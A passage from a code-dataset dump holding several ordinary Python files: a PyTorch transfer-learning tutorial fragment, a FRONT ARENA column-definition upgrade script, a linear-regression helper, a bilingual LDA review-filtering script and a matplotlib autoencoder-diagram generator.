dset_size[phase]\n            epoch_acc = running_corrects / dset_size[phase]\n            print('{} loss: {:.4f} Acc: {:.4f}'.format(phase, epoch_loss, epoch_acc))\n            # keep a snapshot of the best model seen so far on the validation set,\n            # so the reported best accuracy and returned model are meaningful\n            if phase == 'val' and epoch_acc > best_acc:\n                best_acc = epoch_acc\n                best_model = copy.deepcopy(model)\n        print()\n    time_elapsed = time.time() - since\n    print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))\n    print('Best val Acc: {:.4f}'.format(best_acc))\n    return best_model\n\n\ndef exp_lr_scheduler(optimizer, epoch, init_lr=0.001, lr_decay_epoch=7):\n    \"\"\"Decay learning rate by a factor of 0.1 every lr_decay_epoch epochs.\"\"\"\n    lr = init_lr * (0.1 ** (epoch // lr_decay_epoch))\n\n    if epoch % lr_decay_epoch == 0:\n        print('LR is set to {}'.format(lr))\n\n    for param_group in optimizer.param_groups:\n        param_group['lr'] = lr\n\n    return optimizer\n\n\ndef visualize_model(model, num_images=6):\n    images_so_far = 0\n    fig = plt.figure()\n\n    for i, data in enumerate(dset_loaders['val']):\n        inputs, labels = data\n        inputs, labels = Variable(inputs), Variable(labels)\n        outputs = model(inputs)\n        _, preds = torch.max(outputs.data, 1)\n\n        for j in range(inputs.size()[0]):\n            images_so_far += 1\n            ax = plt.subplot(num_images // 2, 2, images_so_far)\n            ax.axis('off')\n            ax.set_title('predicted: {}'.format(dset_classes[preds[j]]))\n            imshow(inputs.cpu().data[j])\n\n            if images_so_far == num_images:\n                return\n\n\nmodel_ft = models.resnet18(pretrained=True)\nnum_ftrs = model_ft.fc.in_features\nmodel_ft.fc = nn.Linear(num_ftrs, 2)\n\ncriterion = nn.CrossEntropyLoss()\n\n# Observe that all parameters are being optimized\noptimizer_ft = optim.SGD(model_ft.parameters(), lr=0.001, momentum=0.9)\nmodel_ft = train_model(model_ft, criterion, optimizer_ft, exp_lr_scheduler,\n                       num_epochs=25)\n","sub_path":"PyTorch_Tutorials/transfer_learning/transfer_learning.py","file_name":"transfer_learning.py","file_ext":"py","file_size_in_byte":4954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"328661614","text":"from __future__ import print_function\n\n\n\"\"\"----------------------------------------------------------------------------\nMODULE\n    FColumnDefinitionUpgrade - Migrate FColumnDefinitions to FColumnAppearance\n\nDESCRIPTION\n\n\n    (c) Copyright 2011 by SunGard FRONT ARENA. 
All rights reserved.\n\n----------------------------------------------------------------------------\"\"\"\n\nimport datetime\nimport sets\nimport re\n\nimport acm\n\nimport FExtensionUtils\nfrom FHTML import *\n\nmoved_column_attributes=sets.ImmutableSet(['Background', 'BkgFlash', 'BkgOrderBestInOrderBook',\\\n 'BkgOrderCanMatch', 'BkgOrderDeleted', 'BkgOrderDone',\\\n 'BkgOrderInactive', 'BkgOrderMoved',\\\n 'BkgOrgsOrderAsk', 'BkgOrgsOrderBid', 'BkgStripe', 'BkgTradeInactive',\\\n 'BkgTradersOrderAsk', 'BkgTradersOrderBid', 'BkgUserEdited', 'Text',\\\n 'TextDisconnected', 'TextFlash', 'TextPendingRefresh', 'ValueTruncate',\\\n 'ValueTruncation', 'Alignment', 'Flashing', 'FontBold', 'Font', 'FontSize'])\n\ndef write_report(fname, new_col_def, old_col_def, col_app, description): \n \"\"\"Produce HTML report of the changed colmn defintions\"\"\"\n \n res = [\"\"\" Changed column definition %s\n \"\"\" % (description,)] \n res.append(\"\"\"
<body>\n<h1> Changed column definition %s</h1>\n\"\"\" % (description,) )\n    res.append(\"\"\"Produced on: %s<br>\n\"\"\" % (str(datetime.datetime.now())[0:19],) )\n    res.append(\"\"\"By user: %s<br>\n\"\"\" % (acm.UserName(),) )\n    res.append(\"\"\"ADS: %s<br>\n\"\"\" % (acm.ADSAddress(),) )\n    res.append(\"\"\"The following changes have been made to the column definitions. \"\"\")\n    res.append(\"\"\"The changes are not saved; \"\"\")\n    res.append(\"\"\"hence, to keep them save the changed modules in the extension manager.<br>\n\"\"\")\n    res.append(h2(\"Changed column definitions (total = %d)\" % (len(new_col_def),)))\n\n    modules = sets.Set([col.module_name for col in new_col_def])\n    new_col_def.sort()\n    old_col_def.sort()\n\n    while len(modules):\n        active_mod = modules.pop()\n        res.append(h3(\"[\" + active_mod + \"]\"))\n        for col in new_col_def:\n            if col.module_name == active_mod:\n                res.append(ref(col.extension_name) + \", \")\n\n    if len(new_col_def) == len(old_col_def):\n        for i in range(len(new_col_def)):\n            res.append(h3(anchor(new_col_def[i].extension_name)))\n            res.append(\"<table><tr><td>\")\n            res.append(h4(\"New column definition\"))\n            res.append(\"</td><td>\")\n            res.append(h4(\"Old column definition\"))\n            res.append(\"</td></tr><tr><td>\")\n            for line in new_col_def[i].create_definition().split('\\n'):\n                attr = re.match(r\" ([\\w]+)=([\\w /%\\-&]+)\", line)\n                if attr and attr.groups()[0] == \"ColumnAppearance\":\n                    res.append(hilite(\"&nbsp;&nbsp;ColumnAppearance=\" + ref(attr.groups()[1]) + \"<br>\"))\n                else:\n                    res.append(line.replace(' ', \"&nbsp;\") + \"<br>\")\n            res.append(\"</td><td>\")\n            for line in old_col_def[i].create_definition().split('\\n'):\n                attrb = re.match(r\" ([\\w]+)=.*\", line)\n                if attrb and attrb.groups()[0] in moved_column_attributes:\n                    res.append(hilite(line.replace(' ', \"&nbsp;\") + \"<br>\"))\n                else:\n                    res.append(line.replace(' ', \"&nbsp;\") + \"<br>\")\n            res.append(\"</td></tr>\")\n            res.append(\"</table><br><br>\")\n\n        res.append(h2(\"New ColumnAppearance definitions\"))\n        for app in col_app:\n            res.append(h3(anchor(app.extension_name)))\n            for line in app.create_definition().split('\\n'):\n                res.append(line.replace(' ', \"&nbsp;\") + \"<br>\")\n            res.append(\"
\")\n \n else:\n res.append(\"Data error\")\n \n res.append(\"\"\"\"\"\")\n outfile = open(fname, 'w')\n outfile.write(\"\".join(res))\n\n\ndef find_and_change_old_coldefs(modules):\n \n #Get all column definitions\n columns = FExtensionUtils.get_column_in_module(modules)\n\n #Find the columns that contains attributes that have been moved to column appearance\n columns_containing_moved_attributes =[item for item in columns \\\n if sets.Set(item.attribute_dictionary.keys()) & moved_column_attributes]\n \n #Make a copy of the list with column defintions\n old_column_def=[]\n for col in columns_containing_moved_attributes:\n old_column_def.append(FExtensionUtils.ColumnDefinition(col.module_name, col.class_name, col.extension_name, {}))\n for key in col.attribute_dictionary.keys():\n old_column_def[-1].attribute_dictionary[key] = col.attribute_dictionary[key]\n \n new_ColumneAppearances=[]\n dummy_context = acm.FExtensionContext()\n #Make the changes in the column defintions and column attributes\n for col_def in columns_containing_moved_attributes: \n if col_def.attribute_dictionary.has_key(\"ColumnAppearance\"):\n context = modules.get_context()\n columnAppearanceName = col_def.attribute_dictionary[\"ColumnAppearance\"]\n columnAppearance = FExtensionUtils.get_extensions(context, \"FColumnAppearance\", columnAppearanceName)\n \n newColumnAppearance = FExtensionUtils.ColumnDefinition.create_from_definition(columnAppearance) \n if not newColumnAppearance:\n #If the column appearance refered in the column definition does not exist, \n #we create a new empty one \n dummyColApp = \"[OldColDefs]FObject:ColumnAppearance =\\n \"\n newColumnAppearance = FExtensionUtils.ColumnDefinition.create_from_definition(dummyColApp) \n print (\"Not possible to create new column appearance based on \" + columnAppearanceName +\\\n \". 
Creating new empty column appearance.\")\n else:\n newColumnAppearance=FExtensionUtils.ColumnDefinition(col_def.module_name, \"FObject\", \"ColumnAppearance\", {})\n \n #Rename the column appearance\n newColumnAppearance.extension_name += '_' + col_def.extension_name.replace(' ', '_')\n col_def.attribute_dictionary[\"ColumnAppearance\"] = newColumnAppearance.extension_name\n #This while loop guranties that you don't override an existing ColumnAppearnce by adding an\n #underscore to the name while the column appearnce name exists\n while FExtensionUtils.get_extensions(modules.get_context(), \"FColumnAppearance\", newColumnAppearance.extension_name):\n newColumnAppearance.extension_name += '_'\n col_def.attribute_dictionary[\"ColumnAppearance\"] = newColumnAppearance.extension_name\n \n new_ColumneAppearances.append(newColumnAppearance) \n #Move the attributes from the column definition to the column apperance\n for key in(sets.Set(col_def.attribute_dictionary.keys()) & moved_column_attributes):\n newColumnAppearance.attribute_dictionary[key]=col_def.attribute_dictionary[key]\n del col_def.attribute_dictionary[key]\n \n #Apply the changes\n if acm.ShortVersion()[0:3]=='3.2':\n dummy_context.AddModule(col_def.module_name)\n dummy_context.EditImport(\"FColumnAppearance\", newColumnAppearance.create_definition(), 0)\n dummy_context.EditImport(\"FColumnDefinition\", col_def.create_definition(), 0)\n dummy_context.RemoveModule(col_def.module_name)\n else:\n dummy_context.AddModule(col_def.module_name)\n dummy_context.EditImport(\"FColumnAppearance\", newColumnAppearance.create_definition())\n dummy_context.EditImport(\"FColumnDefinition\", col_def.create_definition())\n dummy_context.RemoveModule(col_def.module_name) \n \n #Print report of the changes\n return columns_containing_moved_attributes, old_column_def, new_ColumneAppearances\n\ndef scan_contexts_and_report(context, users, reportname, write_summary_report):\n res = [h3(\"Old column definition type\")]\n remAttr = []\n for cont in context:\n print (\"Scanning context\", cont.StringKey(), \"for old column definition types\")\n if write_summary_report:\n report = reportname + \"_files\\\\UpgradeCol_\" + cont.StringKey() + \".html\"\n report_link = reportname[reportname.rfind(\"\\\\\")+1:] + \"_files\\\\UpgradeCol_\" + cont.StringKey() + \".html\"\n else:\n report = reportname + \"_UpgradeCol_\" + cont.StringKey() + \".html\"\n report_link = report\n modules = FExtensionUtils.get_modules(users, cont)\n columns_containing_moved_attributes, old_column_def, new_ColumneAppearances \\\n = find_and_change_old_coldefs(modules)\n if len(columns_containing_moved_attributes):\n remAttr.append((cont, len(columns_containing_moved_attributes)))\n write_report(report, columns_containing_moved_attributes,\\\n old_column_def, new_ColumneAppearances, \"in context \" + cont.StringKey())\n res.append(str(len(columns_containing_moved_attributes)))\n res.append(\" updated column definitions in context \")\n res.append(html_link(cont.StringKey(), report_link))\n res.append('
')\n if not remAttr:\n if write_summary_report:\n res.append(\"No old column definition type found in the scanned contexts
\")\n else:\n print (\"No old column definition type found in context\", context[0].StringKey())\n return None\n elif write_summary_report:\n sum = 0\n for attr in remAttr: sum += attr[1]\n res.append(\"Total \")\n res.append(str(sum))\n res.append(\" updated column definitions
\")\n else:\n return report\n return \"\".join(res)\n\ndef scan_modules_and_report(module, reportname, write_summary_report):\n print (\"Scanning modules for old column definition types...\")\n if write_summary_report:\n report = reportname + \"_files\\\\UpgradeCol_in_modules.html\"\n report_link = reportname[reportname.rfind(\"\\\\\")+1:] + \"_files\\\\UpgradeCol_in_modules.html\"\n else:\n report = reportname + \"_UpgradeCol_in_modules.html\"\n report_link = report\n modules = FExtensionUtils.get_moduleDict(module)\n columns_containing_moved_attributes, old_column_def, new_ColumneAppearances \\\n = find_and_change_old_coldefs(modules)\n if len(columns_containing_moved_attributes):\n write_report(report, columns_containing_moved_attributes,\\\n old_column_def, new_ColumneAppearances, \"in modules \" + modules.StringKey())\n res = [str(len(columns_containing_moved_attributes))]\n res.append(\" updated column definitions in the \")\n res.append(html_link(\"scanned modules\", report_link))\n res.append('
')\n res = \"\".join(res)\n if not write_summary_report:\n res = report\n elif write_summary_report:\n res = \"No old column definition type found in the scanned modules
\"\n else:\n res = None\n print (\"No old column definition type found in the scanned modules\")\n return res\n\n\n\n\n\n","sub_path":"Extensions/ExtensionToolMod/FPythonCode/FColumnDefinitionUpgrade.py","file_name":"FColumnDefinitionUpgrade.py","file_ext":"py","file_size_in_byte":11295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"386867362","text":"import pandas as pd\n\nx = [1.0, 1.6, 3.4, 4.0, 5.2]\ny = [1.2, 2.0, 2.4, 3.5, 3.5]\n\ndef lin_reg(a,b):\n xf= pd.array(a)\n yf= pd.array(b)\n\n def suma(a):\n sum = 0\n for i in range(len(a)):\n sum = a[i] + sum\n return sum\n xy = xf * yf\n x2 = xf*xf\n n = len(xf)\n\n a = ((n * suma(xy)) - (suma(xf) * suma(yf))) / ((n * suma(x2)) - (suma(xf) * suma(xf)))\n b = ((suma(yf) * suma(x2)) - (suma(xy) * suma(xf))) / ((n * suma(x2)) - (suma(xf) * suma(xf)))\n\n return a,b\n\nprint(lin_reg(x,y))\n","sub_path":"linreg.py","file_name":"linreg.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"58574066","text":"import csv\nimport os\n\nfrom langdetect import detect\nimport spacy\nimport nltk\nfrom nltk.corpus import stopwords\n\ncsvFileName = 'LDA_00_CorpusAnalysis_KeywordsTable_output_IMP.csv'\nkeywordsTable = list(csv.reader(open(csvFileName,encoding='utf-8'),delimiter=',')) # CSV file to 2 dimensional list of string\ncsvFileName = 'LDA_00_CorpusAnalysis_dctMaster.csv'\ndctMaster = list(csv.reader(open(csvFileName,encoding='utf-8'),delimiter=',')) # CSV file to 2 dimensional list of string\ndctWords = [dctMaster[i][0] for i in range(1,len(dctMaster)) if len(dctMaster[i][6]) == 2]\nprint(dctWords)\nkeywordsTableDe = []\nkeywordsTableEn = []\n\nnlpDe = spacy.load('de_core_news_sm')\nnlpEn = spacy.load(\"en_core_web_sm\")\n\nstop_words_en = stopwords.words('english')\nstop_words_de = stopwords.words('german')\n\ntokenizer = nltk.RegexpTokenizer(r\"\\w+\")\n\ndef unique(list1):\n # intilize a null list\n unique_list = []\n\n # traverse for all elements\n for x in list1:\n # check if exists in unique_list or not\n if x not in unique_list:\n unique_list.append(x)\n\n return unique_list\n\ndef germanSpacyLemmatizer(token):\n token = token.lower()\n lemmed = ''\n for t in nlpDe.tokenizer(token):\n lemmed = lemmed + ' ' + t.lemma_\n return lemmed.strip()\n\ndef englishSpacyLemmatizer(token):\n token = token.lower()\n lemmed = ''\n for t in nlpEn.tokenizer(token):\n lemmed = lemmed + ' ' + t.lemma_\n return lemmed.strip()\n\nkeywordsOutDe = []\nkeywordsOutEn = []\nfor j in range(len(keywordsTable)):\n for k in range(1,len(keywordsTable[j])):\n keyword = keywordsTable[j][k]\n keywordLang = keyword[0:3]\n keyword = keyword.replace('en:','').replace('de:','')\n itsGermanKeyword = True\n if keywordLang == \"en:\":\n itsGermanKeyword = False\n else:\n itsGermanKeyword = True\n if itsGermanKeyword == True:\n keyword = germanSpacyLemmatizer(keyword)\n keywordsTableDe.append(keyword)\n keywordsOutDe_temp = []\n keywordsOutDe_temp.append(keywordsTable[j][0])\n keywordsOutDe_temp.append(keyword)\n keywordsOutDe.append(keywordsOutDe_temp)\n else:\n keyword = englishSpacyLemmatizer(keyword)\n keywordsTableEn.append(keyword)\n keywordsOutEn_temp = []\n keywordsOutEn_temp.append(keywordsTable[j][0])\n keywordsOutEn_temp.append(keyword)\n keywordsOutEn.append(keywordsOutEn_temp)\n\nkeywordsTableEn = unique(keywordsTableEn)\nkeywordsTableDe = unique(keywordsTableDe)\ncsvFileNameOut = 
'LDA_01_ReviewsPicker_keywordsEn.csv'\ncsvFileOut = open(csvFileNameOut, \"w\", newline='', encoding='utf-8')\ncsv_out = csv.writer(csvFileOut, delimiter=',')\nfor c in range(len(keywordsOutEn)):\n csv_out.writerow(keywordsOutEn[c]) # + features)\ncsvFileNameOut = 'LDA_01_ReviewsPicker_keywordsDe.csv'\ncsvFileOut = open(csvFileNameOut, \"w\", newline='', encoding='utf-8')\ncsv_out = csv.writer(csvFileOut, delimiter=',')\nfor c in range(len(keywordsOutDe)):\n csv_out.writerow(keywordsOutDe[c]) # + features)\n\nprint('Keywords files created.')\n\ndef reviewHit(review):\n fetchThis = False\n doc = review\n itsGerman = True\n try:\n if detect(doc) == 'en':\n itsGerman = False\n except:\n itsGerman = True\n\n doc = tokenizer.tokenize(doc)\n\n if itsGerman == True:\n for wd in doc:\n wd = wd.lower()\n if wd not in stop_words_de: # remove stopwords\n # stemmed_word = stemmerDe.stem(wd).lower() # stemming\n lemmed_word = germanSpacyLemmatizer(wd)\n if lemmed_word in dctWords:\n fetchThis = True\n return fetchThis\n else:\n continue\n else:\n for wd in doc:\n wd = wd.lower()\n if wd not in stop_words_en: # remove stopwords\n # stemmed_word = stemmerDe.stem(wd).lower() # stemming\n lemmed_word = englishSpacyLemmatizer(wd)\n if lemmed_word in dctWords:\n fetchThis = True\n return fetchThis\n else:\n continue\n\ncsvFileNameOut = 'LDA_01_ReviewsPicker_Master_Data_for_training.csv'\ncsvFileOut = open(csvFileNameOut, \"w\", newline='', encoding='utf-8')\ncsv_out = csv.writer(csvFileOut, delimiter='|')\n\ndir = 'MasterData_160_companies/'\nfiles = [f for f in os.listdir(dir) if os.path.isfile(os.path.join(dir, f))]\nprint(files)\n\nfirstFile = True\ntotalReviews = 0\nfor f in range(len(files)):\n csvFileName = dir + files[f]\n masterData = list(csv.reader(open(csvFileName, encoding='utf-8'), delimiter='|')) # CSV file to 2 dimensional list of string\n\n if firstFile:\n csv_out.writerow(masterData[0]) # + features)\n firstFile = False\n\n # for i in range(1,len(masterData)):\n # review = masterData[i][9].strip()\n # # if (review != ''):\n # # csv_out.writerow(masterData[i])\n # # if ((masterData[i][7] == 'Gleichberechtigung' or masterData[i][7] == 'Umgang mit älteren Kollegen') and review != '') or reviewHit(review) == True:\n # # csv_out.writerow(masterData[i])\n # if reviewHit(review) == True and review != '':\n # csv_out.writerow(masterData[i])\n #\n # if i%100 == 0:\n # print(str(i) + \" reviews processed.\")\n\n for i in range(1,len(masterData),10):\n review = masterData[i][9].strip()\n bigReview = ''\n for j in range(i,i+10):\n bigReview = bigReview + ' ' + masterData[j][9].strip()\n masterData[i][9] = bigReview\n if (len(bigReview.strip()) > 50 and reviewHit(bigReview) == True):\n csv_out.writerow(masterData[i])\n totalReviews += 1\n # if ((masterData[i][7] == 'Gleichberechtigung' or masterData[i][7] == 'Umgang mit älteren Kollegen') and review != '') or reviewHit(review) == True:\n # csv_out.writerow(masterData[i])\n # if reviewHit(review) == True:\n # csv_out.writerow(masterData[i])\n\n if i%100 == 0:\n print(str(i) + \" reviews processed.\")\n\nprint('total reviews are', str(totalReviews))\n\n# csvFileNameOut = 'pickedReviews.csv'\n# csvFileOut = open(csvFileNameOut, \"w\", newline='', encoding='utf-8')\n# csv_out = csv.writer(csvFileOut, delimiter='|')\n# csv_out.writerow(masterData[0][7:10]) # + features)\n\n# takes approx half hour to process 160 companies 
{"seq_id":"193413688","text":"import matplotlib\nmatplotlib.use(\"agg\")\nimport matplotlib.pyplot as plt # noqa: E402\nimport numpy as np # noqa: E402\nfrom PIL import Image # noqa: E402\nimport json\n\n# Get variables from vars.txt file\nf = open('public/vars.txt')\nvariables = json.load(f)\nf.close()\nBACKGROUND = variables[\"BACKGROUND\"]\nIMGBORDER = variables[\"IMGBORDER\"]\nEDGE = variables[\"EDGE\"]\nNEG_LINE_COLOR = variables[\"NEG_LINE_COLOR\"]\nPOS_LINE_COLOR = variables[\"POS_LINE_COLOR\"]\nDPI = variables[\"DPI\"]\n\n# This is an image that will be used to fill in the visualization blocks\n# for each node in the neural network. If we were to build an actual neural\n# network and attach it, we could use visualizations of the nodes instead.\nFILLER_IMAGE_FILENAME = \"public/input.png\"\n\n# Changing these adjusts the size and layout of the visualization\nFIGURE_WIDTH = 16\nFIGURE_HEIGHT = 6\nRIGHT_BORDER = 0.7\nLEFT_BORDER = 0.7\nTOP_BORDER = 0.8\nBOTTOM_BORDER = 0.6\n\nN_IMAGE_PIXEL_COLS = 64\nN_IMAGE_PIXEL_ROWS = 48\nN_NODES_BY_LAYER = [30, 25, 20, 10, 5, 10, 20, 30]\n\nINPUT_IMAGE_BOTTOM = 3\nINPUT_IMAGE_HEIGHT = 0.25 * FIGURE_HEIGHT\nERROR_IMAGE_SCALE = 0.7\nERROR_GAP_SCALE = 0.3\nBETWEEN_LAYER_SCALE = 0.8\nBETWEEN_NODE_SCALE = 0.4\n\nLINE_WIDTH_SCALER = 0.6\n\n\ndef main():\n    \"\"\"\n    Build a visualization of an image autoencoder neural network,\n    piece by piece.\n    A central data structure in this example is the collection of parameters\n    that define how the image is laid out. It is a set of nested dictionaries.\n    \"\"\"\n    p = construct_parameters()\n    fig, ax_boss = create_background(p)\n\n    p = find_node_image_size(p)\n    p = find_between_layer_gap(p)\n    p = find_between_node_gap(p)\n    p = find_error_image_position(p)\n\n    filler_image = load_filler_image()\n    image_axes = []\n    add_input_image(fig, image_axes, p, filler_image)\n    for i_layer in range(p[\"network\"][\"n_layers\"]):\n        add_node_images(fig, i_layer, image_axes, p, filler_image)\n    add_output_image(fig, image_axes, p, filler_image)\n    add_error_image(fig, image_axes, p, filler_image)\n    add_layer_connections(ax_boss, image_axes)\n    save_nn_viz(fig)\n\n\ndef construct_parameters():\n    \"\"\"\n    Build a dictionary of parameters that describe the size and location\n    of the elements of the visualization. This is a convenient way to pass\n    the collection of them around.\n    \"\"\"\n    # Enforce square pixels. 
Each pixel will have the same height and width.\n aspect_ratio = N_IMAGE_PIXEL_COLS / N_IMAGE_PIXEL_ROWS\n\n parameters = {}\n\n # The figure as a whole\n parameters[\"figure\"] = {\n \"height\": FIGURE_HEIGHT,\n \"width\": FIGURE_WIDTH,\n }\n\n # The input and output images\n parameters[\"input\"] = {\n \"n_cols\": N_IMAGE_PIXEL_COLS,\n \"n_rows\": N_IMAGE_PIXEL_ROWS,\n \"aspect_ratio\": aspect_ratio,\n \"image\": {\n \"bottom\": INPUT_IMAGE_BOTTOM,\n \"height\": INPUT_IMAGE_HEIGHT,\n \"width\": INPUT_IMAGE_HEIGHT * aspect_ratio,\n }\n }\n\n # The network as a whole\n parameters[\"network\"] = {\n \"n_nodes\": N_NODES_BY_LAYER,\n \"n_layers\": len(N_NODES_BY_LAYER),\n \"max_nodes\": np.max(N_NODES_BY_LAYER),\n }\n\n # Individual node images\n parameters[\"node_image\"] = {\n \"height\": 0,\n \"width\": 0,\n }\n\n parameters[\"error_image\"] = {\n \"left\": 0,\n \"bottom\": 0,\n \"width\": parameters[\"input\"][\"image\"][\"width\"] * ERROR_IMAGE_SCALE,\n \"height\": parameters[\"input\"][\"image\"][\"height\"] * ERROR_IMAGE_SCALE,\n }\n\n parameters[\"gap\"] = {\n \"right_border\": RIGHT_BORDER,\n \"left_border\": LEFT_BORDER,\n \"bottom_border\": BOTTOM_BORDER,\n \"top_border\": TOP_BORDER,\n \"between_layer\": 0,\n \"between_layer_scale\": BETWEEN_LAYER_SCALE,\n \"between_node\": 0,\n \"between_node_scale\": BETWEEN_NODE_SCALE,\n \"error_gap_scale\": ERROR_GAP_SCALE,\n }\n\n return parameters\n\n\ndef create_background(p):\n fig = plt.figure(\n edgecolor=EDGE,\n facecolor=BACKGROUND,\n figsize=(p[\"figure\"][\"width\"], p[\"figure\"][\"height\"]),\n linewidth=4,\n )\n ax_boss = fig.add_axes((0, 0, 1, 1), facecolor=\"none\")\n ax_boss.set_xlim(0, 1)\n ax_boss.set_ylim(0, 1)\n return fig, ax_boss\n\n\ndef find_node_image_size(p):\n \"\"\"\n What should the height and width of each node image be?\n As big as possible, given the constraints.\n There are two possible constraints:\n 1. Fill the figure top-to-bottom.\n 2. 
Fill the figure side-to-side.\n To determine which of these limits the size of the node images,\n we'll calculate the image size assuming each constraint separately,\n then respect the one that results in the smaller node image.\n \"\"\"\n # First assume height is the limiting factor.\n total_space_to_fill = (\n p[\"figure\"][\"height\"]\n - p[\"gap\"][\"bottom_border\"]\n - p[\"gap\"][\"top_border\"]\n )\n # Use the layer with the largest number of nodes (n_max).\n # Pack the images and the gaps as tight as possible.\n # In that case, if the image height is h,\n # the gaps will each be h * p[\"gap\"][\"between_node_scale\"].\n # There will be n_max nodes and (n_max - 1) gaps.\n # After a wee bit of algebra:\n height_constrained_by_height = (\n total_space_to_fill / (\n p[\"network\"][\"max_nodes\"]\n + (p[\"network\"][\"max_nodes\"] - 1)\n * p[\"gap\"][\"between_node_scale\"]\n )\n )\n\n # Second assume width is the limiting factor.\n total_space_to_fill = (\n p[\"figure\"][\"width\"]\n - p[\"gap\"][\"left_border\"]\n - p[\"gap\"][\"right_border\"]\n - 2 * p[\"input\"][\"image\"][\"width\"]\n )\n # Again, pack the images as tightly as possible side-to-side.\n # In this case, if the image width is w,\n # the gaps will each be w * p[\"gap\"][\"between_layer_scale\"].\n # There will be n_layer nodes and (n_layer + 1) gaps.\n # After another tidbit of algebra:\n width_constrained_by_width = (\n total_space_to_fill / (\n p[\"network\"][\"n_layers\"]\n + (p[\"network\"][\"n_layers\"] + 1)\n * p[\"gap\"][\"between_layer_scale\"]\n )\n )\n\n # Figure out what the height would be for this width.\n height_constrained_by_width = (\n width_constrained_by_width\n / p[\"input\"][\"aspect_ratio\"]\n )\n\n # See which constraint is more restrictive, and go with that one.\n p[\"node_image\"][\"height\"] = np.minimum(\n height_constrained_by_width,\n height_constrained_by_height)\n p[\"node_image\"][\"width\"] = (\n p[\"node_image\"][\"height\"]\n * p[\"input\"][\"aspect_ratio\"]\n )\n return p\n\n\ndef find_between_layer_gap(p):\n \"\"\"\n How big is the horizontal spacing between_layers?\n This is also the spacing between the input image and the first layer\n and between the last layer and the output image.\n \"\"\"\n horizontal_gap_total = (\n p[\"figure\"][\"width\"]\n - 2 * p[\"input\"][\"image\"][\"width\"]\n - p[\"network\"][\"n_layers\"] * p[\"node_image\"][\"width\"]\n - p[\"gap\"][\"left_border\"]\n - p[\"gap\"][\"right_border\"]\n )\n n_horizontal_gaps = p[\"network\"][\"n_layers\"] + 1\n p[\"gap\"][\"between_layer\"] = horizontal_gap_total / n_horizontal_gaps\n return p\n\n\ndef find_between_node_gap(p):\n \"\"\"\n How big is the vertical gap between_node images?\n \"\"\"\n vertical_gap_total = (\n p[\"figure\"][\"height\"]\n - p[\"gap\"][\"top_border\"]\n - p[\"gap\"][\"bottom_border\"]\n - p[\"network\"][\"max_nodes\"]\n * p[\"node_image\"][\"height\"]\n )\n n_vertical_gaps = p[\"network\"][\"max_nodes\"] - 1\n p[\"gap\"][\"between_node\"] = vertical_gap_total / n_vertical_gaps\n return p\n\n\ndef find_error_image_position(p):\n \"\"\"\n Where exactly should the error image be positioned?\n \"\"\"\n p[\"error_image\"][\"bottom\"] = (\n p[\"input\"][\"image\"][\"bottom\"]\n - p[\"input\"][\"image\"][\"height\"]\n * p[\"gap\"][\"error_gap_scale\"]\n - p[\"error_image\"][\"height\"]\n )\n error_image_center = (\n p[\"figure\"][\"width\"]\n - p[\"gap\"][\"right_border\"]\n - p[\"input\"][\"image\"][\"width\"] / 2\n )\n p[\"error_image\"][\"left\"] = (\n error_image_center\n - 
p[\"error_image\"][\"width\"] / 2\n    )\n    return p\n\n\ndef add_input_image(fig, image_axes, p, filler_image):\n    \"\"\"\n    All Axes to be added use the rectangle specification\n    (left, bottom, width, height)\n    \"\"\"\n    absolute_pos = (\n        p[\"gap\"][\"left_border\"],\n        p[\"input\"][\"image\"][\"bottom\"],\n        p[\"input\"][\"image\"][\"width\"],\n        p[\"input\"][\"image\"][\"height\"])\n    ax_input = add_image_axes(fig, image_axes, p, absolute_pos)\n    add_filler_image(\n        ax_input,\n        p[\"input\"][\"n_rows\"],\n        p[\"input\"][\"n_cols\"],\n        filler_image\n    )\n    image_axes.append([ax_input])\n\n\ndef add_node_images(fig, i_layer, image_axes, p, filler_image):\n    \"\"\"\n    Add in all the node images for a single layer\n    \"\"\"\n    node_image_left = (\n        p[\"gap\"][\"left_border\"]\n        + p[\"input\"][\"image\"][\"width\"]\n        + i_layer * p[\"node_image\"][\"width\"]\n        + (i_layer + 1) * p[\"gap\"][\"between_layer\"]\n    )\n    n_nodes = p[\"network\"][\"n_nodes\"][i_layer]\n    total_layer_height = (\n        n_nodes * p[\"node_image\"][\"height\"]\n        + (n_nodes - 1) * p[\"gap\"][\"between_node\"]\n    )\n    layer_bottom = (p[\"figure\"][\"height\"] - total_layer_height) / 2\n    layer_axes = []\n    for i_node in range(n_nodes):\n        node_image_bottom = (\n            layer_bottom + i_node * (\n                p[\"node_image\"][\"height\"] + p[\"gap\"][\"between_node\"]))\n\n        absolute_pos = (\n            node_image_left,\n            node_image_bottom,\n            p[\"node_image\"][\"width\"],\n            p[\"node_image\"][\"height\"])\n        ax = add_image_axes(fig, image_axes, p, absolute_pos)\n        add_filler_image(\n            ax,\n            p[\"input\"][\"n_rows\"],\n            p[\"input\"][\"n_cols\"],\n            filler_image\n        )\n        layer_axes.append(ax)\n    image_axes.append(layer_axes)\n\n\ndef add_output_image(fig, image_axes, p, filler_image):\n    output_image_left = (\n        p[\"figure\"][\"width\"]\n        - p[\"input\"][\"image\"][\"width\"]\n        - p[\"gap\"][\"right_border\"]\n    )\n    absolute_pos = (\n        output_image_left,\n        p[\"input\"][\"image\"][\"bottom\"],\n        p[\"input\"][\"image\"][\"width\"],\n        p[\"input\"][\"image\"][\"height\"])\n    ax_output = add_image_axes(fig, image_axes, p, absolute_pos)\n    add_filler_image(\n        ax_output,\n        p[\"input\"][\"n_rows\"],\n        p[\"input\"][\"n_cols\"],\n        filler_image\n    )\n    image_axes.append([ax_output])\n\n\ndef add_error_image(fig, image_axes, p, filler_image):\n    absolute_pos = (\n        p[\"error_image\"][\"left\"],\n        p[\"error_image\"][\"bottom\"],\n        p[\"error_image\"][\"width\"],\n        p[\"error_image\"][\"height\"])\n    ax_error = add_image_axes(fig, image_axes, p, absolute_pos)\n    add_filler_image(\n        ax_error,\n        p[\"input\"][\"n_rows\"],\n        p[\"input\"][\"n_cols\"],\n        filler_image\n    )\n\n\ndef add_image_axes(fig, image_axes, p, absolute_pos):\n    \"\"\"\n    Locate the Axes for the image corresponding to this node within the Figure.\n    absolute_pos: Tuple of\n        (left_position, bottom_position, width, height)\n        in inches on the 